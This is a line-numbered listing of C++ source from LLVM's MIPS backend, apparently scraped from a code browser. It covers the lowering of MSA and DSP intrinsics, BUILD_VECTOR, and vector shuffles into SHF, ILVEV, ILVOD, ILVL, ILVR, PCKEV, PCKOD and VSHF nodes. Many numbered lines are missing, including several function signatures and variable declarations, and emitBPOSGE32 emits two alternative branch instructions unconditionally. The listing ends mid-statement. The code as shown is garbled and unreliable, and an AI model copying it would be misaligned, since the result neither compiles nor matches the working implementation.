2255  return lowerDSPIntr(Op, DAG, MipsISD::MAQ_SA_W_PHR); 2256  case Intrinsic::mips_dpaq_s_w_ph: 2257  return lowerDSPIntr(Op, DAG, MipsISD::DPAQ_S_W_PH); 2258  case Intrinsic::mips_dpsq_s_w_ph: 2259  return lowerDSPIntr(Op, DAG, MipsISD::DPSQ_S_W_PH); 2260  case Intrinsic::mips_dpaq_sa_l_w: 2261  return lowerDSPIntr(Op, DAG, MipsISD::DPAQ_SA_L_W); 2262  case Intrinsic::mips_dpsq_sa_l_w: 2263  return lowerDSPIntr(Op, DAG, MipsISD::DPSQ_SA_L_W); 2264  case Intrinsic::mips_dpaqx_s_w_ph: 2265  return lowerDSPIntr(Op, DAG, MipsISD::DPAQX_S_W_PH); 2266  case Intrinsic::mips_dpaqx_sa_w_ph: 2267  return lowerDSPIntr(Op, DAG, MipsISD::DPAQX_SA_W_PH); 2268  case Intrinsic::mips_dpsqx_s_w_ph: 2269  return lowerDSPIntr(Op, DAG, MipsISD::DPSQX_S_W_PH); 2270  case Intrinsic::mips_dpsqx_sa_w_ph: 2271  return lowerDSPIntr(Op, DAG, MipsISD::DPSQX_SA_W_PH); 2272  case Intrinsic::mips_ld_b: 2273  case Intrinsic::mips_ld_h: 2274  case Intrinsic::mips_ld_w: 2275  case Intrinsic::mips_ld_d: 2276  return lowerMSALoadIntr(Op, DAG, Intr, Subtarget); 2277  } 2278 } 2279  2280 static SDValue lowerMSAStoreIntr(SDValue Op, SelectionDAG &DAG, unsigned Intr, 2281  const MipsSubtarget &Subtarget) { 2282  SDLoc DL(Op); 2283  SDValue ChainIn = Op->getOperand(0); 2284  SDValue Value = Op->getOperand(2); 2285  SDValue Address = Op->getOperand(3); 2286  SDValue Offset = Op->getOperand(4); 2287  EVT PtrTy = Address->getValueType(0); 2288  2289  // For N64 addresses have the underlying type MVT::i64. This intrinsic 2290  // however takes an i32 signed constant offset. The actual type of the 2291  // intrinsic is a scaled signed i10. 2292  if (Subtarget.isABI_N64()) 2293  Offset = DAG.getNode(ISD::SIGN_EXTEND, DL, PtrTy, Offset); 2294  2295  Address = DAG.getNode(ISD::ADD, DL, PtrTy, Address, Offset); 2296  2297  return DAG.getStore(ChainIn, DL, Value, Address, MachinePointerInfo(), 2298  /* Alignment = */ 16); 2299 } 2300  2301 SDValue MipsSETargetLowering::lowerINTRINSIC_VOID(SDValue Op, 2302  SelectionDAG &DAG) const { 2303  unsigned Intr = cast<ConstantSDNode>(Op->getOperand(1))->getZExtValue(); 2304  switch (Intr) { 2305  default: 2306  return SDValue(); 2307  case Intrinsic::mips_st_b: 2308  case Intrinsic::mips_st_h: 2309  case Intrinsic::mips_st_w: 2310  case Intrinsic::mips_st_d: 2311  return lowerMSAStoreIntr(Op, DAG, Intr, Subtarget); 2312  } 2313 } 2314  2315 /// \brief Check if the given BuildVectorSDNode is a splat. 2316 /// This method currently relies on DAG nodes being reused when equivalent, 2317 /// so it's possible for this to return false even when isConstantSplat returns 2318 /// true. 2319 static bool isSplatVector(const BuildVectorSDNode *N) { 2320  unsigned int nOps = N->getNumOperands(); 2321  assert(nOps > 1 && "isSplatVector has 0 or 1 sized build vector"); 2322  2323  SDValue Operand0 = N->getOperand(0); 2324  2325  for (unsigned int i = 1; i < nOps; ++i) { 2326  if (N->getOperand(i) != Operand0) 2327  return false; 2328  } 2329  2330  return true; 2331 } 2332  2333 // Lower ISD::EXTRACT_VECTOR_ELT into MipsISD::VEXTRACT_SEXT_ELT. 2334 // 2335 // The non-value bits resulting from ISD::EXTRACT_VECTOR_ELT are undefined. We 2336 // choose to sign-extend but we could have equally chosen zero-extend. The 2337 // DAGCombiner will fold any sign/zero extension of the ISD::EXTRACT_VECTOR_ELT 2338 // result into this node later (possibly changing it to a zero-extend in the 2339 // process). 2340 SDValue MipsSETargetLowering:: 2341 lowerEXTRACT_VECTOR_ELT(SDValue Op, SelectionDAG &DAG) const { 2342  SDLoc DL(Op); 2343  EVT ResTy = Op->getValueType(0); 2344  SDValue Op0 = Op->getOperand(0); 2345  EVT VecTy = Op0->getValueType(0); 2346  2347  if (!VecTy.is128BitVector()) 2348  return SDValue(); 2349  2350  if (ResTy.isInteger()) { 2351  SDValue Op1 = Op->getOperand(1); 2352  EVT EltTy = VecTy.getVectorElementType(); 2353  return DAG.getNode(MipsISD::VEXTRACT_SEXT_ELT, DL, ResTy, Op0, Op1, 2354  DAG.getValueType(EltTy)); 2355  } 2356  2357  return Op; 2358 } 2359  2360 static bool isConstantOrUndef(const SDValue Op) { 2361  if (Op->isUndef()) 2362  return true; 2363  if (isa<ConstantSDNode>(Op)) 2364  return true; 2365  if (isa<ConstantFPSDNode>(Op)) 2366  return true; 2367  return false; 2368 } 2369  2371  for (unsigned i = 0; i < Op->getNumOperands(); ++i) 2372  if (isConstantOrUndef(Op->getOperand(i))) 2373  return true; 2374  return false; 2375 } 2376  2377 // Lowers ISD::BUILD_VECTOR into appropriate SelectionDAG nodes for the 2378 // backend. 2379 // 2380 // Lowers according to the following rules: 2381 // - Constant splats are legal as-is as long as the SplatBitSize is a power of 2382 // 2 less than or equal to 64 and the value fits into a signed 10-bit 2383 // immediate 2384 // - Constant splats are lowered to bitconverted BUILD_VECTORs if SplatBitSize 2385 // is a power of 2 less than or equal to 64 and the value does not fit into a 2386 // signed 10-bit immediate 2387 // - Non-constant splats are legal as-is. 2388 // - Non-constant non-splats are lowered to sequences of INSERT_VECTOR_ELT. 2389 // - All others are illegal and must be expanded. 2390 SDValue MipsSETargetLowering::lowerBUILD_VECTOR(SDValue Op, 2391  SelectionDAG &DAG) const { 2392  BuildVectorSDNode *Node = cast<BuildVectorSDNode>(Op); 2393  EVT ResTy = Op->getValueType(0); 2394  SDLoc DL(Op); 2395  APInt SplatValue, SplatUndef; 2396  unsigned SplatBitSize; 2397  bool HasAnyUndefs; 2398  2399  if (!Subtarget.hasMSA() || !ResTy.is128BitVector()) 2400  return SDValue(); 2401  2402  if (Node->isConstantSplat(SplatValue, SplatUndef, SplatBitSize, 2403  HasAnyUndefs, 8, 2404  !Subtarget.isLittle()) && SplatBitSize <= 64) { 2405  // We can only cope with 8, 16, 32, or 64-bit elements 2406  if (SplatBitSize != 8 && SplatBitSize != 16 && SplatBitSize != 32 && 2407  SplatBitSize != 64) 2408  return SDValue(); 2409  2410  // If the value isn't an integer type we will have to bitcast 2411  // from an integer type first. Also, if there are any undefs, we must 2412  // lower them to defined values first. 2413  if (ResTy.isInteger() && !HasAnyUndefs) 2414  return Op; 2415  2416  EVT ViaVecTy; 2417  2418  switch (SplatBitSize) { 2419  default: 2420  return SDValue(); 2421  case 8: 2422  ViaVecTy = MVT::v16i8; 2423  break; 2424  case 16: 2425  ViaVecTy = MVT::v8i16; 2426  break; 2427  case 32: 2428  ViaVecTy = MVT::v4i32; 2429  break; 2430  case 64: 2431  // There's no fill.d to fall back on for 64-bit values 2432  return SDValue(); 2433  } 2434  2435  // SelectionDAG::getConstant will promote SplatValue appropriately. 2436  SDValue Result = DAG.getConstant(SplatValue, DL, ViaVecTy); 2437  2438  // Bitcast to the type we originally wanted 2439  if (ViaVecTy != ResTy) 2440  Result = DAG.getNode(ISD::BITCAST, SDLoc(Node), ResTy, Result); 2441  2442  return Result; 2443  } else if (isSplatVector(Node)) 2444  return Op; 2445  else if (!isConstantOrUndefBUILD_VECTOR(Node)) { 2446  // Use INSERT_VECTOR_ELT operations rather than expand to stores. 2447  // The resulting code is the same length as the expansion, but it doesn't 2448  // use memory operations 2449  EVT ResTy = Node->getValueType(0); 2450  2451  assert(ResTy.isVector()); 2452  2453  unsigned NumElts = ResTy.getVectorNumElements(); 2454  SDValue Vector = DAG.getUNDEF(ResTy); 2455  for (unsigned i = 0; i < NumElts; ++i) { 2456  Vector = DAG.getNode(ISD::INSERT_VECTOR_ELT, DL, ResTy, Vector, 2457  Node->getOperand(i), 2458  DAG.getConstant(i, DL, MVT::i32)); 2459  } 2460  return Vector; 2461  } 2462  2463  return SDValue(); 2464 } 2465  2466 // Lower VECTOR_SHUFFLE into SHF (if possible). 2467 // 2468 // SHF splits the vector into blocks of four elements, then shuffles these 2469 // elements according to a <4 x i2> constant (encoded as an integer immediate). 2470 // 2471 // It is therefore possible to lower into SHF when the mask takes the form: 2472 // <a, b, c, d, a+4, b+4, c+4, d+4, a+8, b+8, c+8, d+8, ...> 2473 // When undef's appear they are treated as if they were whatever value is 2474 // necessary in order to fit the above forms. 2475 // 2476 // For example: 2477 // %2 = shufflevector <8 x i16> %0, <8 x i16> undef, 2478 // <8 x i32> <i32 3, i32 2, i32 1, i32 0, 2479 // i32 7, i32 6, i32 5, i32 4> 2480 // is lowered to: 2481 // (SHF_H $w0, $w1, 27) 2482 // where the 27 comes from: 2483 // 3 + (2 << 2) + (1 << 4) + (0 << 6) 2485  SmallVector<int, 16> Indices, 2486  SelectionDAG &DAG) { 2487  int SHFIndices[4] = { -1, -1, -1, -1 }; 2488  2489  if (Indices.size() < 4) 2490  return SDValue(); 2491  2492  for (unsigned i = 0; i < 4; ++i) { 2493  for (unsigned j = i; j < Indices.size(); j += 4) { 2494  int Idx = Indices[j]; 2495  2496  // Convert from vector index to 4-element subvector index 2497  // If an index refers to an element outside of the subvector then give up 2498  if (Idx != -1) { 2499  Idx -= 4 * (j / 4); 2500  if (Idx < 0 || Idx >= 4) 2501  return SDValue(); 2502  } 2503  2504  // If the mask has an undef, replace it with the current index. 2505  // Note that it might still be undef if the current index is also undef 2506  if (SHFIndices[i] == -1) 2507  SHFIndices[i] = Idx; 2508  2509  // Check that non-undef values are the same as in the mask. If they 2510  // aren't then give up 2511  if (!(Idx == -1 || Idx == SHFIndices[i])) 2512  return SDValue(); 2513  } 2514  } 2515  2516  // Calculate the immediate. Replace any remaining undefs with zero 2517  APInt Imm(32, 0); 2518  for (int i = 3; i >= 0; --i) { 2519  int Idx = SHFIndices[i]; 2520  2521  if (Idx == -1) 2522  Idx = 0; 2523  2524  Imm <<= 2; 2525  Imm |= Idx & 0x3; 2526  } 2527  2528  SDLoc DL(Op); 2529  return DAG.getNode(MipsISD::SHF, DL, ResTy, 2530  DAG.getConstant(Imm, DL, MVT::i32), Op->getOperand(0)); 2531 } 2532  2533 /// Determine whether a range fits a regular pattern of values. 2534 /// This function accounts for the possibility of jumping over the End iterator. 2535 template <typename ValType> 2536 static bool 2538  unsigned CheckStride, 2540  ValType ExpectedIndex, unsigned ExpectedIndexStride) { 2541  auto &I = Begin; 2542  2543  while (I != End) { 2544  if (*I != -1 && *I != ExpectedIndex) 2545  return false; 2546  ExpectedIndex += ExpectedIndexStride; 2547  2548  // Incrementing past End is undefined behaviour so we must increment one 2549  // step at a time and check for End at each step. 2550  for (unsigned n = 0; n < CheckStride && I != End; ++n, ++I) 2551  ; // Empty loop body. 2552  } 2553  return true; 2554 } 2555  2556 // Determine whether VECTOR_SHUFFLE is a SPLATI. 2557 // 2558 // It is a SPLATI when the mask is: 2559 // <x, x, x, ...> 2560 // where x is any valid index. 2561 // 2562 // When undef's appear in the mask they are treated as if they were whatever 2563 // value is necessary in order to fit the above form. 2564 static bool isVECTOR_SHUFFLE_SPLATI(SDValue Op, EVT ResTy, 2565  SmallVector<int, 16> Indices, 2566  SelectionDAG &DAG) { 2567  assert((Indices.size() % 2) == 0); 2568  2569  int SplatIndex = -1; 2570  for (const auto &V : Indices) { 2571  if (V != -1) { 2572  SplatIndex = V; 2573  break; 2574  } 2575  } 2576  2577  return fitsRegularPattern<int>(Indices.begin(), 1, Indices.end(), SplatIndex, 2578  0); 2579 } 2580  2581 // Lower VECTOR_SHUFFLE into ILVEV (if possible). 2582 // 2583 // ILVEV interleaves the even elements from each vector. 2584 // 2585 // It is possible to lower into ILVEV when the mask consists of two of the 2586 // following forms interleaved: 2587 // <0, 2, 4, ...> 2588 // <n, n+2, n+4, ...> 2589 // where n is the number of elements in the vector. 2590 // For example: 2591 // <0, 0, 2, 2, 4, 4, ...> 2592 // <0, n, 2, n+2, 4, n+4, ...> 2593 // 2594 // When undef's appear in the mask they are treated as if they were whatever 2595 // value is necessary in order to fit the above forms. 2597  SmallVector<int, 16> Indices, 2598  SelectionDAG &DAG) { 2599  assert((Indices.size() % 2) == 0); 2600  2601  SDValue Wt; 2602  SDValue Ws; 2603  const auto &Begin = Indices.begin(); 2604  const auto &End = Indices.end(); 2605  2606  // Check even elements are taken from the even elements of one half or the 2607  // other and pick an operand accordingly. 2608  if (fitsRegularPattern<int>(Begin, 2, End, 0, 2)) 2609  Wt = Op->getOperand(0); 2610  else if (fitsRegularPattern<int>(Begin, 2, End, Indices.size(), 2)) 2611  Wt = Op->getOperand(1); 2612  else 2613  return SDValue(); 2614  2615  // Check odd elements are taken from the even elements of one half or the 2616  // other and pick an operand accordingly. 2617  if (fitsRegularPattern<int>(Begin + 1, 2, End, 0, 2)) 2618  Ws = Op->getOperand(0); 2619  else if (fitsRegularPattern<int>(Begin + 1, 2, End, Indices.size(), 2)) 2620  Ws = Op->getOperand(1); 2621  else 2622  return SDValue(); 2623  2624  return DAG.getNode(MipsISD::ILVEV, SDLoc(Op), ResTy, Ws, Wt); 2625 } 2626  2627 // Lower VECTOR_SHUFFLE into ILVOD (if possible). 2628 // 2629 // ILVOD interleaves the odd elements from each vector. 2630 // 2631 // It is possible to lower into ILVOD when the mask consists of two of the 2632 // following forms interleaved: 2633 // <1, 3, 5, ...> 2634 // <n+1, n+3, n+5, ...> 2635 // where n is the number of elements in the vector. 2636 // For example: 2637 // <1, 1, 3, 3, 5, 5, ...> 2638 // <1, n+1, 3, n+3, 5, n+5, ...> 2639 // 2640 // When undef's appear in the mask they are treated as if they were whatever 2641 // value is necessary in order to fit the above forms. 2643  SmallVector<int, 16> Indices, 2644  SelectionDAG &DAG) { 2645  assert((Indices.size() % 2) == 0); 2646  2647  SDValue Wt; 2648  SDValue Ws; 2649  const auto &Begin = Indices.begin(); 2650  const auto &End = Indices.end(); 2651  2652  // Check even elements are taken from the odd elements of one half or the 2653  // other and pick an operand accordingly. 2654  if (fitsRegularPattern<int>(Begin, 2, End, 1, 2)) 2655  Wt = Op->getOperand(0); 2656  else if (fitsRegularPattern<int>(Begin, 2, End, Indices.size() + 1, 2)) 2657  Wt = Op->getOperand(1); 2658  else 2659  return SDValue(); 2660  2661  // Check odd elements are taken from the odd elements of one half or the 2662  // other and pick an operand accordingly. 2663  if (fitsRegularPattern<int>(Begin + 1, 2, End, 1, 2)) 2664  Ws = Op->getOperand(0); 2665  else if (fitsRegularPattern<int>(Begin + 1, 2, End, Indices.size() + 1, 2)) 2666  Ws = Op->getOperand(1); 2667  else 2668  return SDValue(); 2669  2670  return DAG.getNode(MipsISD::ILVOD, SDLoc(Op), ResTy, Wt, Ws); 2671 } 2672  2673 // Lower VECTOR_SHUFFLE into ILVR (if possible). 2674 // 2675 // ILVR interleaves consecutive elements from the right (lowest-indexed) half of 2676 // each vector. 2677 // 2678 // It is possible to lower into ILVR when the mask consists of two of the 2679 // following forms interleaved: 2680 // <0, 1, 2, ...> 2681 // <n, n+1, n+2, ...> 2682 // where n is the number of elements in the vector. 2683 // For example: 2684 // <0, 0, 1, 1, 2, 2, ...> 2685 // <0, n, 1, n+1, 2, n+2, ...> 2686 // 2687 // When undef's appear in the mask they are treated as if they were whatever 2688 // value is necessary in order to fit the above forms. 2690  SmallVector<int, 16> Indices, 2691  SelectionDAG &DAG) { 2692  assert((Indices.size() % 2) == 0); 2693  2694  SDValue Wt; 2695  SDValue Ws; 2696  const auto &Begin = Indices.begin(); 2697  const auto &End = Indices.end(); 2698  2699  // Check even elements are taken from the right (lowest-indexed) elements of 2700  // one half or the other and pick an operand accordingly. 2701  if (fitsRegularPattern<int>(Begin, 2, End, 0, 1)) 2702  Wt = Op->getOperand(0); 2703  else if (fitsRegularPattern<int>(Begin, 2, End, Indices.size(), 1)) 2704  Wt = Op->getOperand(1); 2705  else 2706  return SDValue(); 2707  2708  // Check odd elements are taken from the right (lowest-indexed) elements of 2709  // one half or the other and pick an operand accordingly. 2710  if (fitsRegularPattern<int>(Begin + 1, 2, End, 0, 1)) 2711  Ws = Op->getOperand(0); 2712  else if (fitsRegularPattern<int>(Begin + 1, 2, End, Indices.size(), 1)) 2713  Ws = Op->getOperand(1); 2714  else 2715  return SDValue(); 2716  2717  return DAG.getNode(MipsISD::ILVR, SDLoc(Op), ResTy, Ws, Wt); 2718 } 2719  2720 // Lower VECTOR_SHUFFLE into ILVL (if possible). 2721 // 2722 // ILVL interleaves consecutive elements from the left (highest-indexed) half 2723 // of each vector. 2724 // 2725 // It is possible to lower into ILVL when the mask consists of two of the 2726 // following forms interleaved: 2727 // <x, x+1, x+2, ...> 2728 // <n+x, n+x+1, n+x+2, ...> 2729 // where n is the number of elements in the vector and x is half n. 2730 // For example: 2731 // <x, x, x+1, x+1, x+2, x+2, ...> 2732 // <x, n+x, x+1, n+x+1, x+2, n+x+2, ...> 2733 // 2734 // When undef's appear in the mask they are treated as if they were whatever 2735 // value is necessary in order to fit the above forms. 2737  SmallVector<int, 16> Indices, 2738  SelectionDAG &DAG) { 2739  assert((Indices.size() % 2) == 0); 2740  2741  unsigned HalfSize = Indices.size() / 2; 2742  SDValue Wt; 2743  SDValue Ws; 2744  const auto &Begin = Indices.begin(); 2745  const auto &End = Indices.end(); 2746  2747  // Check even elements are taken from the left (highest-indexed) elements of 2748  // one half or the other and pick an operand accordingly. 2749  if (fitsRegularPattern<int>(Begin, 2, End, HalfSize, 1)) 2750  Wt = Op->getOperand(0); 2751  else if (fitsRegularPattern<int>(Begin, 2, End, Indices.size() + HalfSize, 1)) 2752  Wt = Op->getOperand(1); 2753  else 2754  return SDValue(); 2755  2756  // Check odd elements are taken from the left (highest-indexed) elements of 2757  // one half or the other and pick an operand accordingly. 2758  if (fitsRegularPattern<int>(Begin + 1, 2, End, HalfSize, 1)) 2759  Ws = Op->getOperand(0); 2760  else if (fitsRegularPattern<int>(Begin + 1, 2, End, Indices.size() + HalfSize, 2761  1)) 2762  Ws = Op->getOperand(1); 2763  else 2764  return SDValue(); 2765  2766  return DAG.getNode(MipsISD::ILVL, SDLoc(Op), ResTy, Ws, Wt); 2767 } 2768  2769 // Lower VECTOR_SHUFFLE into PCKEV (if possible). 2770 // 2771 // PCKEV copies the even elements of each vector into the result vector. 2772 // 2773 // It is possible to lower into PCKEV when the mask consists of two of the 2774 // following forms concatenated: 2775 // <0, 2, 4, ...> 2776 // <n, n+2, n+4, ...> 2777 // where n is the number of elements in the vector. 2778 // For example: 2779 // <0, 2, 4, ..., 0, 2, 4, ...> 2780 // <0, 2, 4, ..., n, n+2, n+4, ...> 2781 // 2782 // When undef's appear in the mask they are treated as if they were whatever 2783 // value is necessary in order to fit the above forms. 2785  SmallVector<int, 16> Indices, 2786  SelectionDAG &DAG) { 2787  assert((Indices.size() % 2) == 0); 2788  2789  SDValue Wt; 2790  SDValue Ws; 2791  const auto &Begin = Indices.begin(); 2792  const auto &Mid = Indices.begin() + Indices.size() / 2; 2793  const auto &End = Indices.end(); 2794  2795  if (fitsRegularPattern<int>(Begin, 1, Mid, 0, 2)) 2796  Wt = Op->getOperand(0); 2797  else if (fitsRegularPattern<int>(Begin, 1, Mid, Indices.size(), 2)) 2798  Wt = Op->getOperand(1); 2799  else 2800  return SDValue(); 2801  2802  if (fitsRegularPattern<int>(Mid, 1, End, 0, 2)) 2803  Ws = Op->getOperand(0); 2804  else if (fitsRegularPattern<int>(Mid, 1, End, Indices.size(), 2)) 2805  Ws = Op->getOperand(1); 2806  else 2807  return SDValue(); 2808  2809  return DAG.getNode(MipsISD::PCKEV, SDLoc(Op), ResTy, Ws, Wt); 2810 } 2811  2812 // Lower VECTOR_SHUFFLE into PCKOD (if possible). 2813 // 2814 // PCKOD copies the odd elements of each vector into the result vector. 2815 // 2816 // It is possible to lower into PCKOD when the mask consists of two of the 2817 // following forms concatenated: 2818 // <1, 3, 5, ...> 2819 // <n+1, n+3, n+5, ...> 2820 // where n is the number of elements in the vector. 2821 // For example: 2822 // <1, 3, 5, ..., 1, 3, 5, ...> 2823 // <1, 3, 5, ..., n+1, n+3, n+5, ...> 2824 // 2825 // When undef's appear in the mask they are treated as if they were whatever 2826 // value is necessary in order to fit the above forms. 2828  SmallVector<int, 16> Indices, 2829  SelectionDAG &DAG) { 2830  assert((Indices.size() % 2) == 0); 2831  2832  SDValue Wt; 2833  SDValue Ws; 2834  const auto &Begin = Indices.begin(); 2835  const auto &Mid = Indices.begin() + Indices.size() / 2; 2836  const auto &End = Indices.end(); 2837  2838  if (fitsRegularPattern<int>(Begin, 1, Mid, 1, 2)) 2839  Wt = Op->getOperand(0); 2840  else if (fitsRegularPattern<int>(Begin, 1, Mid, Indices.size() + 1, 2)) 2841  Wt = Op->getOperand(1); 2842  else 2843  return SDValue(); 2844  2845  if (fitsRegularPattern<int>(Mid, 1, End, 1, 2)) 2846  Ws = Op->getOperand(0); 2847  else if (fitsRegularPattern<int>(Mid, 1, End, Indices.size() + 1, 2)) 2848  Ws = Op->getOperand(1); 2849  else 2850  return SDValue(); 2851  2852  return DAG.getNode(MipsISD::PCKOD, SDLoc(Op), ResTy, Ws, Wt); 2853 } 2854  2855 // Lower VECTOR_SHUFFLE into VSHF. 2856 // 2857 // This mostly consists of converting the shuffle indices in Indices into a 2858 // BUILD_VECTOR and adding it as an operand to the resulting VSHF. There is 2859 // also code to eliminate unused operands of the VECTOR_SHUFFLE. For example, 2860 // if the type is v8i16 and all the indices are less than 8 then the second 2861 // operand is unused and can be replaced with anything. We choose to replace it 2862 // with the used operand since this reduces the number of instructions overall. 2864  SmallVector<int, 16> Indices, 2865  SelectionDAG &DAG) { 2867  SDValue Op0; 2868  SDValue Op1; 2869  EVT MaskVecTy = ResTy.changeVectorElementTypeToInteger(); 2870  EVT MaskEltTy = MaskVecTy.getVectorElementType(); 2871  bool Using1stVec = false; 2872  bool Using2ndVec = false; 2873  SDLoc DL(Op); 2874  int ResTyNumElts = ResTy.getVectorNumElements(); 2875  2876  for (int i = 0; i < ResTyNumElts; ++i) { 2877  // Idx == -1 means UNDEF 2878  int Idx = Indices[i]; 2879  2880  if (0 <= Idx && Idx < ResTyNumElts) 2881  Using1stVec = true; 2882  if (ResTyNumElts <= Idx && Idx < ResTyNumElts * 2) 2883  Using2ndVec = true; 2884  } 2885  2886  for (SmallVector<int, 16>::iterator I = Indices.begin(); I != Indices.end(); 2887  ++I) 2888  Ops.push_back(DAG.getTargetConstant(*I, DL, MaskEltTy)); 2889  2890  SDValue MaskVec = DAG.getBuildVector(MaskVecTy, DL, Ops); 2891  2892  if (Using1stVec && Using2ndVec) { 2893  Op0 = Op->getOperand(0); 2894  Op1 = Op->getOperand(1); 2895  } else if (Using1stVec) 2896  Op0 = Op1 = Op->getOperand(0); 2897  else if (Using2ndVec) 2898  Op0 = Op1 = Op->getOperand(1); 2899  else 2900  llvm_unreachable("shuffle vector mask references neither vector operand?"); 2901  2902  // VECTOR_SHUFFLE concatenates the vectors in an vectorwise fashion. 2903  // <0b00, 0b01> + <0b10, 0b11> -> <0b00, 0b01, 0b10, 0b11> 2904  // VSHF concatenates the vectors in a bitwise fashion: 2905  // <0b00, 0b01> + <0b10, 0b11> -> 2906  // 0b0100 + 0b1110 -> 0b01001110 2907  // <0b10, 0b11, 0b00, 0b01> 2908  // We must therefore swap the operands to get the correct result. 2909  return DAG.getNode(MipsISD::VSHF, DL, ResTy, MaskVec, Op1, Op0); 2910 } 2911  2912 // Lower VECTOR_SHUFFLE into one of a number of instructions depending on the 2913 // indices in the shuffle. 2914 SDValue MipsSETargetLowering::lowerVECTOR_SHUFFLE(SDValue Op, 2915  SelectionDAG &DAG) const { 2916  ShuffleVectorSDNode *Node = cast<ShuffleVectorSDNode>(Op); 2917  EVT ResTy = Op->getValueType(0); 2918  2919  if (!ResTy.is128BitVector()) 2920  return SDValue(); 2921  2922  int ResTyNumElts = ResTy.getVectorNumElements(); 2923  SmallVector<int, 16> Indices; 2924  2925  for (int i = 0; i < ResTyNumElts; ++i) 2926  Indices.push_back(Node->getMaskElt(i)); 2927  2928  // splati.[bhwd] is preferable to the others but is matched from 2929  // MipsISD::VSHF. 2930  if (isVECTOR_SHUFFLE_SPLATI(Op, ResTy, Indices, DAG)) 2931  return lowerVECTOR_SHUFFLE_VSHF(Op, ResTy, Indices, DAG); 2932  SDValue Result; 2933  if ((Result = lowerVECTOR_SHUFFLE_ILVEV(Op, ResTy, Indices, DAG))) 2934  return Result; 2935  if ((Result = lowerVECTOR_SHUFFLE_ILVOD(Op, ResTy, Indices, DAG))) 2936  return Result; 2937  if ((Result = lowerVECTOR_SHUFFLE_ILVL(Op, ResTy, Indices, DAG))) 2938  return Result; 2939  if ((Result = lowerVECTOR_SHUFFLE_ILVR(Op, ResTy, Indices, DAG))) 2940  return Result; 2941  if ((Result = lowerVECTOR_SHUFFLE_PCKEV(Op, ResTy, Indices, DAG))) 2942  return Result; 2943  if ((Result = lowerVECTOR_SHUFFLE_PCKOD(Op, ResTy, Indices, DAG))) 2944  return Result; 2945  if ((Result = lowerVECTOR_SHUFFLE_SHF(Op, ResTy, Indices, DAG))) 2946  return Result; 2947  return lowerVECTOR_SHUFFLE_VSHF(Op, ResTy, Indices, DAG); 2948 } 2949  2951 MipsSETargetLowering::emitBPOSGE32(MachineInstr &MI, 2952  MachineBasicBlock *BB) const { 2953  // $bb: 2954  // bposge32_pseudo $vr0 2955  // => 2956  // $bb: 2957  // bposge32 $tbb 2958  // $fbb: 2959  // li $vr2, 0 2960  // b $sink 2961  // $tbb: 2962  // li $vr1, 1 2963  // $sink: 2964  // $vr0 = phi($vr2, $fbb, $vr1, $tbb) 2965  2966  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 2968  const TargetRegisterClass *RC = &Mips::GPR32RegClass; 2969  DebugLoc DL = MI.getDebugLoc(); 2970  const BasicBlock *LLVM_BB = BB->getBasicBlock(); 2972  MachineFunction *F = BB->getParent(); 2973  MachineBasicBlock *FBB = F->CreateMachineBasicBlock(LLVM_BB); 2974  MachineBasicBlock *TBB = F->CreateMachineBasicBlock(LLVM_BB); 2976  F->insert(It, FBB); 2977  F->insert(It, TBB); 2978  F->insert(It, Sink); 2979  2980  // Transfer the remainder of BB and its successor edges to Sink. 2981  Sink->splice(Sink->begin(), BB, std::next(MachineBasicBlock::iterator(MI)), 2982  BB->end()); 2984  2985  // Add successors. 2986  BB->addSuccessor(FBB); 2987  BB->addSuccessor(TBB); 2988  FBB->addSuccessor(Sink); 2989  TBB->addSuccessor(Sink); 2990  2991  // Insert the real bposge32 instruction to $BB. 2992  BuildMI(BB, DL, TII->get(Mips::BPOSGE32)).addMBB(TBB); 2993  // Insert the real bposge32c instruction to $BB. 2994  BuildMI(BB, DL, TII->get(Mips::BPOSGE32C_MMR3)).addMBB(TBB); 2995  2996  // Fill $FBB. 2997  unsigned VR2 = RegInfo.createVirtualRegister(RC); 2998  BuildMI(*FBB, FBB->end(), DL, TII->get(Mips::ADDiu), VR2) 2999  .addReg(Mips::ZERO).addImm(0); 3000  BuildMI(*FBB, FBB->end(), DL, TII->get(Mips::B)).addMBB(Sink); 3001  3002  // Fill $TBB. 3003  unsigned VR1 = RegInfo.createVirtualRegister(RC); 3004  BuildMI(*TBB, TBB->end(), DL, TII->get(Mips::ADDiu), VR1) 3005  .addReg(Mips::ZERO).addImm(1); 3006  3007  // Insert phi function to $Sink. 3008  BuildMI(*Sink, Sink->begin(), DL, TII->get(Mips::PHI), 3009  MI.getOperand(0).getReg()) 3010  .addReg(VR2) 3011  .addMBB(FBB) 3012  .addReg(VR1) 3013  .addMBB(TBB); 3014  3015  MI.eraseFromParent(); // The pseudo instruction is gone now. 3016  return Sink; 3017 } 3018  3019 MachineBasicBlock *MipsSETargetLowering::emitMSACBranchPseudo( 3020  MachineInstr &MI, MachineBasicBlock *BB, unsigned BranchOp) const { 3021  // $bb: 3022  // vany_nonzero $rd, $ws 3023  // => 3024  // $bb: 3025  // bnz.b $ws, $tbb 3026  // b $fbb 3027  // $fbb: 3028  // li $rd1, 0 3029  // b $sink 3030  // $tbb: 3031  // li $rd2, 1 3032  // $sink: 3033  // $rd = phi($rd1, $fbb, $rd2, $tbb) 3034  3035  MachineRegisterInfo &RegInfo = BB->getParent()->getRegInfo(); 3037  const TargetRegisterClass *RC = &Mips::GPR32RegClass; 3038  DebugLoc DL = MI.getDebugLoc(); 3039  const BasicBlock *LLVM_BB = BB->getBasicBlock(); 3041  MachineFunction *F = BB->getParent(); 3042  MachineBasicBlock *FBB = F->CreateMachineBasicBlock(LLVM_BB); 3043  MachineBasicBlock *TBB = F->CreateMachineBasicBlock(LLVM_BB); 3045  F->insert(It, FBB); 3046  F->insert(It, TBB); 3047  F->insert(It, Sink); 3048  3049  // Transfer the remainder of BB and its successor edges to Sink. 3050  Sink->splice(Sink->begin(), BB, std::next(MachineBasicBlock::iterator(MI)), 3051  BB->end()); 3053  3054  // Add successors. 3055  BB->addSuccessor(FBB); 3056  BB->addSuccessor(TBB); 3057  FBB->addSuccessor(Sink); 3058  TBB->addSuccessor(Sink); 3059  3060  // Insert the real bnz.b instruction to $BB. 3061  BuildMI(BB, DL, TII->get(BranchOp)) 3062  .addReg(MI.getOperand(1).getReg()) 3063  .addMBB(TBB); 3064  3065  // Fill $FBB. 3066  unsigned RD1 = RegInfo.createVirtualRegister(RC); 3067  BuildMI(*FBB, FBB->end(), DL, TII->get(Mips::ADDiu), RD1) 3068  .addReg(Mips::ZERO).addImm(0); 3069  BuildMI(*FBB, FBB->end(), DL, TII->get(Mips::B)).addMBB(Sink); 3070  3071  // Fill $TBB. 3072  unsigned RD2 = 